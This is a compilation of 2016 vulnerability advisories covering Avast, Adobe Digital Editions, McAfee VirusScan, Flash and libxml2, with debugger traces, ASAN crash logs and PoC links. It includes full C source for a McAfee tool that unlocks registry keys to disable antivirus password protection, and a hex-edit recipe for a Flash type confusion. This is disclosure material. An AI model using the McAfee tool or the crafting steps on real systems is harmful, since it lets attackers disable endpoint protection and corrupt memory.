Source: https://code.google.com/p/google-security-research/issues/detail?id=668
The attached PE file causes memory corruption in Avast; it looks related to authenticode parsing.
(474.c0c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=128be364 ebx=30303030 ecx=12555e70 edx=128bd032 esi=30303030 edi=00000000
eip=740b4454 esp=10cedfa8 ebp=12555e70 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
aswCmnBS_74080000!StreamHashClose+0x7dd4:
740b4454 8b06 mov eax,dword ptr [esi] ds:002b:30303030=????????
0:080> ub
aswCmnBS_74080000!StreamHashClose+0x7dc5:
740b4445 55 push ebp
740b4446 56 push esi
740b4447 57 push edi
740b4448 33ff xor edi,edi
740b444a 8be9 mov ebp,ecx
740b444c 85db test ebx,ebx
740b444e 7447 je aswCmnBS_74080000!StreamHashClose+0x7e17 (740b4497)
740b4450 8b742418 mov esi,dword ptr [esp+18h]
0:080> dd esp+18 L1
10cedfc0 30303030
# It looks like this address was a parameter, let's skip up a frame and see where it comes from
0:080> kvn 3
# ChildEBP RetAddr Args to Child..............
WARNING: Stack unwind information not available. Following frames may be wrong.
00 10cedfb4 740b483e 30303030 30303030 a00be921 aswCmnBS_74080000!StreamHashClose+0x7dd4
01 10cedfe8 740c37e7 12481a88 00cf0400 00000008 aswCmnBS_74080000!StreamHashClose+0x81be
02 10cee028 740aa2f5 12481a90 00001730 00030408 aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xf7
0:080> .frame /c 1
01 10cedfe8 740c37e7 aswCmnBS_74080000!StreamHashClose+0x81be
eax=128be364 ebx=30303030 ecx=12555e70 edx=128bd032 esi=30303030 edi=00000000
eip=740b483e esp=10cedfbc ebp=73e1dca8 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
aswCmnBS_74080000!StreamHashClose+0x81be:
740b483e 8bf8 mov edi,eax
0:080> ub.
aswCmnBS_74080000!StreamHashClose+0x81aa:
740b482a 0000 add byte ptr [eax],al
740b482c 0001 add byte ptr [ecx],al
740b482e 0000 add byte ptr [eax],al
740b4830 00ff add bh,bh
740b4832 7044 jo aswCmnBS_74080000!StreamHashClose+0x81f8 (740b4878)
740b4834 8bce mov ecx,esi
740b4836 ff7040 push dword ptr [eax+40h]
740b4839 e802fcffff call aswCmnBS_74080000!StreamHashClose+0x7dc0 (740b4440)
# The parameter comes from eax+40:
0:080> dd eax+40 L1
128be3a4 30303030
# What is that address?
0:080> !address @eax
Mapping file section regions...
Mapping module regions...
Mapping PEB regions...
Mapping TEB and stack regions...
Mapping heap regions...
Mapping page heap regions...
Mapping other regions...
Mapping stack trace database regions...
Mapping activation context regions...
Usage: Heap
Base Address: 128b8000
End Address: 128ea000
Region Size: 00032000
State: 00001000 MEM_COMMIT
Protect: 00000004 PAGE_READWRITE
Type: 00020000 MEM_PRIVATE
Allocation Base: 12150000
Allocation Protect: 00000004 PAGE_READWRITE
More info: heap owning the address: !heap 0x120000
More info: heap segment
More info: heap entry containing the address: !heap -x 0x128be364
# It's a heap buffer, is it valid?
0:080> !heap -x 0x128be364
Entry User Heap Segment Size PrevSize Unused Flags
-----------------------------------------------------------------------------
128bd038 128bd040 00120000 122ef5e0 1408 - 3f LFH;busy.
# Looks okay to me, where does that buffer come from?
0:080> .frame /c 2
02 10cee028 740aa2f5 aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xf7
eax=128be364 ebx=30303030 ecx=12555e70 edx=128bd032 esi=30303030 edi=00000000
eip=740c37e7 esp=10cedff0 ebp=128be364 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xf7:
740c37e7 83c40c add esp,0Ch
0:080> ub
aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xe3:
740c37d3 0000 add byte ptr [eax],al
740c37d5 0000 add byte ptr [eax],al
740c37d7 8b464c mov eax,dword ptr [esi+4Ch]
740c37da 57 push edi
740c37db 0345e8 add eax,dword ptr [ebp-18h]
740c37de 50 push eax
740c37df ff7510 push dword ptr [ebp+10h]
740c37e2 e88bc70000 call aswCmnBS_74080000!BZ2_bzerr+0x1d62 (740cff72)
0:080> dd ebp-18 L1
128be34c 57d9ddea
That is a really strange offset! And that DWORD appears in the input file at offset 316b3h:
│000316a0 a8 65 18 e9 79 40 62 25-96 6e c7 c7 37 6a 83 21 |?e??y@b%?n??7j?!|...
│000316b0 08 8e 41 ea dd d9 57 3f-1d 77 49 87 2a 16 06 5e |??A???W??wI?*??^|...
│000316c0 a6 38 6a 22 12 a3 51 19-83 7e b6 00 00 31 82 04 |?8j"??Q??~? 1??|...
This looks like broken authenticode parsing to me.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39530.zip
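The trail above ends at a DWORD lifted straight from the file (0x57d9ddea) that is later dereferenced as a pointer. As an added illustration, not code from the original report or from Avast, the Python below reads a PE's Authenticode table the way a hardened parser should: the security data directory's offset and size are checked against the file length before either is used, and every WIN_CERTIFICATE dwLength is checked against the table before it is trusted. The minimal test image, the placeholder certificate bytes and the directory sizes are constructed here; only the 0x57d9ddea offset is taken from the dump.

```python
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4
WIN_CERT_HEADER = struct.Struct("<IHH")   # dwLength, wRevision, wCertificateType


def security_directory(data):
    """Locate the Authenticode table (IMAGE_DIRECTORY_ENTRY_SECURITY).

    Unlike the other directories its VirtualAddress is a raw file offset, so it
    is validated against len(data), not against the section table.
    Returns (offset, size), or None when the image carries no signature table.
    Raises ValueError for any field that would send a reader outside the file.
    """
    size = len(data)
    if size < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a PE image (no MZ header)")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > size or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad e_lfanew or missing PE signature")
    (opt_size,) = struct.unpack_from("<H", data, e_lfanew + 20)
    opt = e_lfanew + 24
    if opt_size < 2 or opt + opt_size > size:
        raise ValueError("optional header runs past end of file")
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic == 0x10B:            # PE32
        nrva_off, dir_off = 92, 96
    elif magic == 0x20B:          # PE32+
        nrva_off, dir_off = 108, 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    if opt_size < nrva_off + 4:
        raise ValueError("optional header too short for data directories")
    (nrva,) = struct.unpack_from("<I", data, opt + nrva_off)
    entry = opt + dir_off + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY
    if nrva <= IMAGE_DIRECTORY_ENTRY_SECURITY or entry + 8 > opt + opt_size:
        return None
    off, dsize = struct.unpack_from("<II", data, entry)
    if off == 0 and dsize == 0:
        return None
    # Python ints do not wrap; a C reader must additionally reject off + dsize overflowing 32 bits.
    if off >= size or dsize > size - off:
        raise ValueError("security directory [0x%x, +0x%x) lies outside the %d-byte file" % (off, dsize, size))
    return off, dsize


def parse_authenticode(data):
    """Walk the WIN_CERTIFICATE entries, checking each dwLength before it is used.

    Returns a list of (wRevision, wCertificateType, bCertificate) tuples.
    """
    where = security_directory(data)
    if where is None:
        return []
    off, end = where[0], where[0] + where[1]
    certs = []
    while off < end:
        if end - off < WIN_CERT_HEADER.size:
            raise ValueError("truncated WIN_CERTIFICATE header at 0x%x" % off)
        length, revision, cert_type = WIN_CERT_HEADER.unpack_from(data, off)
        if length < WIN_CERT_HEADER.size or length > end - off:
            raise ValueError("WIN_CERTIFICATE at 0x%x claims %d bytes, %d available" % (off, length, end - off))
        certs.append((revision, cert_type, data[off + WIN_CERT_HEADER.size:off + length]))
        off += (length + 7) & ~7      # entries are rounded up to 8-byte boundaries
    return certs


# --- constructed test images (not the PoC file attached to the report) ------

HEADER_LEN = 0x40 + 24 + 224          # DOS stub + COFF header + PE32 optional header


def build_pe(sec_offset, sec_size, table=b""):
    """Minimal PE32 image with no sections; the security directory is set by the caller."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                        # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                          # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY, sec_offset, sec_size)
    return dos + coff + bytes(opt) + table


def win_certificate(blob, revision=0x0200, cert_type=0x0002):
    """Encode one WIN_CERTIFICATE (revision 2.0, PKCS#7 SignedData) with 8-byte padding."""
    body = WIN_CERT_HEADER.pack(WIN_CERT_HEADER.size + len(blob), revision, cert_type) + blob
    return body + b"\0" * (-len(body) % 8)


def check(image):
    """Return ('ok', certs) or ('rejected', message) so the outcomes can be compared."""
    try:
        return "ok", parse_authenticode(image)
    except ValueError as err:
        return "rejected", str(err)


if __name__ == "__main__":
    sig = win_certificate(b"\x30\x05\x02\x01\x01\x05\x00")          # placeholder bytes, not a real PKCS#7 blob
    print(check(build_pe(HEADER_LEN, len(sig), sig)))                 # ok: one certificate entry
    print(check(build_pe(0x57D9DDEA, 0x40)))                          # rejected: the DWORD from the dump as an offset
    print(check(build_pe(HEADER_LEN, 16, WIN_CERT_HEADER.pack(0x1000, 0x200, 2) + b"\0" * 8)))  # rejected: inner length
```

Run it directly to see the three outcomes; the second case reuses the reported DWORD as the directory offset and is refused before any read happens. The same two layers of checks belong in a C reader, with the extra condition that the 32-bit sum of offset and size must not wrap.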
########################################################################################
# Title: Adobe Digital Editions <= 4.5.0 - Critical memory corruption
# Application: Adobe Digital Editions
# Version: 4.5.0 and earlier versions
# Platform: Windows, Macintosh, iOS and Android
# Software Link: http://www.adobe.com/solutions/ebook/digital-editions.html
# Date: March 8, 2016
# CVE: CVE-2016-0954
# Author: Pier-Luc Maltais from COSIG
# Contact: https://twitter.com/COSIG_
# Personal contact: https://twitter.com/plmaltais
########################################################################################
===================
Introduction:
===================
Adobe® Digital Editions software offers an engaging way to view and manage eBooks and
other digital publications. Use it to download and purchase digital content, which can
be read both online and offline. Transfer copy-protected eBooks from your personal
computer to other computers or devices. Organize your eBooks into a custom library and
annotate pages. Digital Editions also supports industry-standard eBook formats,
including PDF/A and EPUB. (http://www.adobe.com/ca_fr/products/digital-editions.html)
########################################################################################
===================
Report Timeline:
===================
2015-10-24: Pier-Luc Maltais from COSIG found the issue and reported it to Adobe PSIRT.
2016-03-08: Vendor fixed the issue (APSB16-06).
2016-03-08: Release of this advisory.
########################################################################################
===================
Technical details:
===================
A critical memory corruption occurs when Adobe Digital Editions handles a specially
crafted ExtGState object, which could lead to remote code execution.
########################################################################################
==========
POC:
==========
https://plmsecurity.net/sites/plmsecurity.net/files/APSB16-06_PoC.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39533.zip
########################################################################################
/*
Security Advisory @ Mediaservice.net Srl
(#01, 13/04/2016) Data Security Division
Title: McAfee VirusScan Enterprise security restrictions bypass
Application: McAfee VirusScan Enterprise 8.8 and prior versions
Platform: Microsoft Windows
Description: A local Windows administrator is able to bypass the
security restrictions and disable the antivirus engine
without knowing the correct management password
Author: Maurizio Agazzini <inode@mediaservice.net>
Vendor Status: Fixed
References: http://lab.mediaservice.net/advisory/2016-01-mcafee.txt
http://lab.mediaservice.net/code/mcafee_unprotector.c
1. Abstract.
McAfee VirusScan Enterprise has a feature to protect the scan engine
from local Windows administrators. A management password is needed to
disable it, unless Windows is running in "Safe Mode".
From our understanding this feature is implemented insecurely: the
McAfee VirusScan Console checks the password and requests the engine to
unlock the safe registry keys. No checks are done by the engine itself,
so anyone can directly request the engine to stop without knowing the
correct management password.
2. Example Attack Session.
The attack can be reproduced in different ways, here are some examples.
Example 1:
Open the McAfee VirusScan Console and Sysinternals Process Explorer.
Under Process Explorer:
- Locate the mcconsol.exe process
- Type CTRL+L (show lower pane)
- Search for all "HKLM\SOFTWARE\McAfee\DesktopProtection" keys
- Close all the handles of this registry key
Go back to the McAfee Console and:
- Go to: Tools -> General Options
- Select the "Password Options" tab
- Select "No password" and apply settings
Now it is possible to stop the antivirus engine.
Example 2:
A specific tool has been written to request to disable password
protection. After running the tool you can disable it via the VirusScan
Console.
Code: http://lab.mediaservice.net/code/mcafee_unprotector.c
3. Affected Platforms.
All McAfee VirusScan Enterprise versions up to 8.8 without the SB10151 hotfix are
affected. Exploitation of this vulnerability requires that an attacker
has local Windows administrator privileges.
4. Fix.
On 25 February 2016, the SB10151 hotfix has been released by McAfee,
which fixes the described vulnerability.
https://kc.mcafee.com/corporate/index?page=content&id=SB10151
5. Proof Of Concept.
See Example Attack Session above.
6. Timeline
07/11/2014 - First communication sent to McAfee
17/11/2014 - Second communication sent to McAfee
17/11/2014 - McAfee: Request to send again vulnerability information
18/11/2014 - Sent vulnerability information and PoC again
11/12/2014 - McAfee: Problem confirmed
09/03/2015 - Request for update to McAfee
06/05/2015 - Request for update to McAfee
06/05/2015 - McAfee: Patch release planned for Q3
20/08/2015 - McAfee: Request for deadline delay (31/03/2016)
25/02/2016 - McAfee: SB10151 patch has been released
Copyright (c) 2014-2016 @ Mediaservice.net Srl. All rights reserved.
--
Maurizio Agazzini CISSP, CSSLP, OPST
Senior Security Advisor
@ Mediaservice.net Srl Tel: +39-011-32.72.100
Via Santorelli, 15 Fax: +39-011-32.46.497
10095 Grugliasco (TO) ITALY http://mediaservice.net/disclaimer
"C programmers never die. They are just cast into void"
*/
/*****************************************************************************
* *
* McAfee Data Protector "Unprotector" *
* *
* A little tool to request McAfee scan engine to disable password *
* protection. *
* *
* Advisory: http://lab.mediaservice.net/advisory/2014-01-mcafee.txt *
* *
* This program can be compiled with MinGW (http://www.mingw.org/) *
* *
* Copyright (c) 2014 @ Mediaservice.net Srl. All rights reserved *
* Wrote by Maurizio Agazzini <inode[at]mediaservice.net> *
* *
* This program is free software; you can redistribute it and/or *
* modify it under the terms of the GNU General Public License *
* as published by the Free Software Foundation; either version 2 *
* of the License, or (at your option) any later version. *
* *
* This program is distributed in the hope that it will be useful, *
* but WITHOUT ANY WARRANTY; without even the implied warranty of *
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
* GNU General Public License for more details. *
* *
* You should have received a copy of the GNU General Public License *
* along with this program; if not, write to the Free Software *
* Foundation, Inc., 59 Temple Place *
* Suite 330, Boston, MA 02111-1307, USA. *
* *
*****************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

/* Open the McAfee scan engine control device. CreateFile() signals failure
 * with INVALID_HANDLE_VALUE (not NULL), so that is what each attempt tests. */
HANDLE opendevice(void)
{
    HANDLE result;
    if((result = CreateFile("\\\\.\\WGUARDNT", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == INVALID_HANDLE_VALUE)
    if((result = CreateFile("\\\\.\\Global\\WGUARDNT", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == INVALID_HANDLE_VALUE)
    if((result = CreateFile("\\\\.\\WGUARDNT", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == INVALID_HANDLE_VALUE)
    if((result = CreateFile("\\\\.\\Global\\WGUARDNT", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == INVALID_HANDLE_VALUE)
        result = NULL;
    return result;
}

int main(int argc, char ** argv)
{
    HKEY reg_key = NULL;
    HANDLE p;
    DWORD BytesReturned;
    DWORD data = 0;
    DWORD size = sizeof(DWORD);
    DWORD type = REG_DWORD;
    DWORD data1 = 0;
    const char *status[4] = {
        "No password",
        "Password protection for all items listed",
        "Password protection for the selected items",
        "Password protection for conformance to Common Criteria"
    };

    printf("\n *******************************************\n");
    printf(" * McAfee Desktop Protection \"Unprotector\" *\n");
    printf(" *******************************************\n\n");

    /*
     * The PoC use HKLM\SOFTWARE\McAfee\DesktopProtection\UIPMode registry key to
     * disable the password protection, but you can also access to others useful
     * keys.
     *
     * User Password
     * HKLM\SOFTWARE\McAfee\DesktopProtection\UIP
     * HKLM\SOFTWARE\McAfee\DesktopProtection\UIPEx
     *
     * Buffer protection
     * HKLM\SOFTWARE\McAfee\SystemCore\VSCore\On Access Scanner\BehaviourBlocking\BOPEnabled
     *
     * Access protection
     * HKLM\SOFTWARE\McAfee\SystemCore\VSCore\On Access Scanner\BehaviourBlocking\APEnabled
     *
     * On Access Scanner
     * HKLM\SOFTWARE\McAfee\DesktopProtection\OASState
     * HKLM\SOFTWARE\McAfee\SystemCore\VSCore\On Access Scanner\McShield\Configuration\OASEnabled
     *
     * Others
     * HKLM\SOFTWARE\McAfee\SystemCore\VSCore\LockDownEnabled
     *
     */
    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\McAfee\\DesktopProtection", 0, KEY_QUERY_VALUE | KEY_READ | 0x0200, &reg_key) != ERROR_SUCCESS)
    {
        /* 32-bit build on 64-bit Windows: the key lives under Wow6432Node */
        if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Wow6432Node\\McAfee\\DesktopProtection", 0, KEY_QUERY_VALUE | KEY_READ | 0x0200, &reg_key) != ERROR_SUCCESS)
        {
            printf("Error opening registry key...\n");
            return 1;
        }
    }

    // Check current status of McAfee protection (the value is an index into status[])
    if (RegQueryValueEx(reg_key, "UIPMode", NULL, &type, (BYTE *)&data, &size) == ERROR_SUCCESS && data < 4)
        printf(" [+] Current UIPMode = %lu (%s)\n\n", data, status[data]);
    else
        printf(" [+] Current UIPMode = %lu (unknown)\n\n", data);
    RegCloseKey(reg_key);

    // Open McAfee magic device
    p = opendevice();
    if (p == NULL)
    {
        printf(" Error opening the \\\\.\\WGUARDNT device...\n");
        return 1;
    }
    printf(" [-] Please John, let me write to your registry keys...");

    // Request to the scan engine to stop protecting registry keys
    DeviceIoControl(p, 0x9EDB6510u, 0, 0, 0, 0, &BytesReturned, 0);

    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\McAfee\\DesktopProtection", 0, KEY_QUERY_VALUE | KEY_READ | KEY_SET_VALUE, &reg_key) != ERROR_SUCCESS)
    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\McAfee\\DesktopProtection", 0, KEY_QUERY_VALUE | KEY_READ | KEY_SET_VALUE, &reg_key) != ERROR_SUCCESS)
    {
        printf(" hmmm hmmm something went wrong!\n\n");
        printf(" [-] Ok John, take the control again!\n");
        DeviceIoControl(p, 0x9EDB6514u, 0, 0, 0, 0, &BytesReturned, 0);
        CloseHandle(p);
        return 1;
    }
    printf(" OK\n");

    data1 = 0;
    if( argc > 1 )
        data1 = atoi(argv[1]);

    // Disable McAfee protection
    if( RegSetValueEx(reg_key, "UIPMode", 0, REG_DWORD, (CONST BYTE *)&data1, sizeof(DWORD)) != ERROR_SUCCESS)
        printf("\n hmmm hmmm something went wrong!\n");
    else
        printf("\n [+] Thank you! now we got the control! UIPMode = %lu\n", data1);
    RegCloseKey(reg_key);

    printf("\n [+] Run \"%s %lu\" to get original settings\n\n", argv[0], data);

    // Tell the engine to take control again
    printf(" [-] Ok John, take the control again!\n");
    DeviceIoControl(p, 0x9EDB6514u, 0, 0, 0, 0, &BytesReturned, 0);
    CloseHandle(p);
    return 0;
}
Source: https://code.google.com/p/google-security-research/issues/detail?id=640
There is a type confusion vulnerability in the SimpleButton constructor. Flash stores an empty button to use to create buttons for optimization reasons. If this object is created using a SWF tag before it is created in the Button class, and is not of type Button, type confusion can occur.
A SWF needs to be altered in a hex editor to reproduce this issue. To start, build button.fla. This is a swf with the code:
var sb = new SimpleButton();
and a font attached. Decompress the swf using flasm -x button.swf, and then replace all occurrences of the font ID (0x0001) in the three tags that use it with the ID of the empty button object (0xfff6).
When the button is created, the font will be type confused with a button.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39476.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=638
The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint /path/to/file"):
--- cut ---
==4588==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6290000049e6 at pc 0x00000062b643 bp 0x7ffffa00f570 sp 0x7ffffa00f568
READ of size 1 at 0x6290000049e6 thread T0
#0 0x62b642 in xmlParseEndTag2 libxml2-2.9.3/parser.c:9828:13
#1 0x61d620 in xmlParseElement libxml2-2.9.3/parser.c:10238:2
#2 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6
#3 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5
#4 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6
#5 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5
#6 0x63be9b in xmlParseDocument libxml2-2.9.3/parser.c:10912:2
#7 0x672b74 in xmlDoRead libxml2-2.9.3/parser.c:15390:5
#8 0x673041 in xmlReadFile libxml2-2.9.3/parser.c:15452:13
#9 0x4f5b60 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2401:9
#10 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
0x6290000049e6 is located 2018 bytes to the right of 16388-byte region [0x629000000200,0x629000004204)
allocated by thread T0 here:
#0 0x4b8ef0 in realloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:61
#1 0xa079a5 in xmlBufGrowInternal libxml2-2.9.3/buf.c:486:23
#2 0xa06722 in xmlBufGrow libxml2-2.9.3/buf.c:515:11
#3 0x72fef4 in xmlParserInputBufferGrow libxml2-2.9.3/xmlIO.c:3326:9
#4 0x543b22 in xmlParserInputGrow libxml2-2.9.3/parserInternals.c:320:8
#5 0x569d10 in xmlGROW libxml2-2.9.3/parser.c:2081:5
#6 0x68208d in xmlParseNCNameComplex libxml2-2.9.3/parser.c:3499:6
#7 0x68136d in xmlParseNCName libxml2-2.9.3/parser.c:3591:12
#8 0x67d282 in xmlParseQName libxml2-2.9.3/parser.c:8859:9
#9 0x61f04d in xmlParseStartTag2 libxml2-2.9.3/parser.c:9381:17
#10 0x61a626 in xmlParseElement libxml2-2.9.3/parser.c:10129:16
#11 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6
#12 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5
#13 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6
#14 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5
#15 0x63be9b in xmlParseDocument libxml2-2.9.3/parser.c:10912:2
#16 0x672b74 in xmlDoRead libxml2-2.9.3/parser.c:15390:5
#17 0x673041 in xmlReadFile libxml2-2.9.3/parser.c:15452:13
#18 0x4f5b60 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2401:9
#19 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
SUMMARY: AddressSanitizer: heap-buffer-overflow libxml2-2.9.3/parser.c:9828:13 in xmlParseEndTag2
Shadow bytes around the buggy address:
0x0c527fff88e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff88f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c527fff8930: fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa fa
0x0c527fff8940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8960: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8980: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==4588==ABORTING
--- cut ---
The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758589. Attached is an XML file which triggers the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39492.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=637
The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint --html /path/to/file"):
--- cut ---
==25920==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x631000010810 at pc 0x0000004a2f25 bp 0x7ffc81805ae0 sp 0x7ffc81805290
READ of size 73661 at 0x631000010810 thread T0
#0 0x4a2f24 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
#1 0xd026b2 in xmlDictAddString libxml2-2.9.3/dict.c:285:5
#2 0xd009e8 in xmlDictLookup libxml2-2.9.3/dict.c:926:11
#3 0x806e4d in htmlParseNameComplex libxml2-2.9.3/HTMLparser.c:2517:12
#4 0x7cc29d in htmlParseName libxml2-2.9.3/HTMLparser.c:2483:12
#5 0x7ca6f1 in htmlParseEntityRef libxml2-2.9.3/HTMLparser.c:2682:16
#6 0x820a0d in htmlParseReference libxml2-2.9.3/HTMLparser.c:4044:8
#7 0x7df716 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4619:3
#8 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5
#9 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5
#10 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13
#11 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8
#12 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
0x631000010810 is located 0 bytes to the right of 65552-byte region [0x631000000800,0x631000010810)
allocated by thread T0 here:
#0 0x4b8ef0 in realloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:61
#1 0xa079a5 in xmlBufGrowInternal libxml2-2.9.3/buf.c:486:23
#2 0xa06722 in xmlBufGrow libxml2-2.9.3/buf.c:515:11
#3 0x72fef4 in xmlParserInputBufferGrow libxml2-2.9.3/xmlIO.c:3326:9
#4 0x543b22 in xmlParserInputGrow libxml2-2.9.3/parserInternals.c:320:8
#5 0x8067f4 in htmlParseNameComplex libxml2-2.9.3/HTMLparser.c:2511:6
#6 0x7cc29d in htmlParseName libxml2-2.9.3/HTMLparser.c:2483:12
#7 0x7ca6f1 in htmlParseEntityRef libxml2-2.9.3/HTMLparser.c:2682:16
#8 0x820a0d in htmlParseReference libxml2-2.9.3/HTMLparser.c:4044:8
#9 0x7df716 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4619:3
#10 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5
#11 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5
#12 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13
#13 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8
#14 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
Shadow bytes around the buggy address:
0x0c627fffa0b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c627fffa0c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c627fffa0d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c627fffa0e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c627fffa0f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c627fffa100: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c627fffa110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c627fffa120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c627fffa130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c627fffa140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c627fffa150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
